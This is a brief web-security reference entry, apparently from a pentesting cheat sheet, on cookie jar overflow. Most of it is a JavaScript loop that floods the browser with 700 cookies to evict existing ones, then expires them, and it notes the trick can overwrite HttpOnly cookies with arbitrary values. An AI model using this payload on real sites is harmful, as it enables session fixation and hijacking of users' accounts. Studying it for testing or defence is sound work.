Cookie Jar Overflow

Browsers have a limit on the number of cookies they can store for a page. This allows you to supplant cookies by adding new ones:

// Set many cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Third-party cookies pointing to a different domain will not be overwritten

Cookie jar overflow can be used for overwrite HttpOnly cookies, so you can remove them and reset with an arbitrary value.

References

• HackTricks: Cookie Jar Overflow

• Overwriting HttpOnly cookies using cookie jar overflow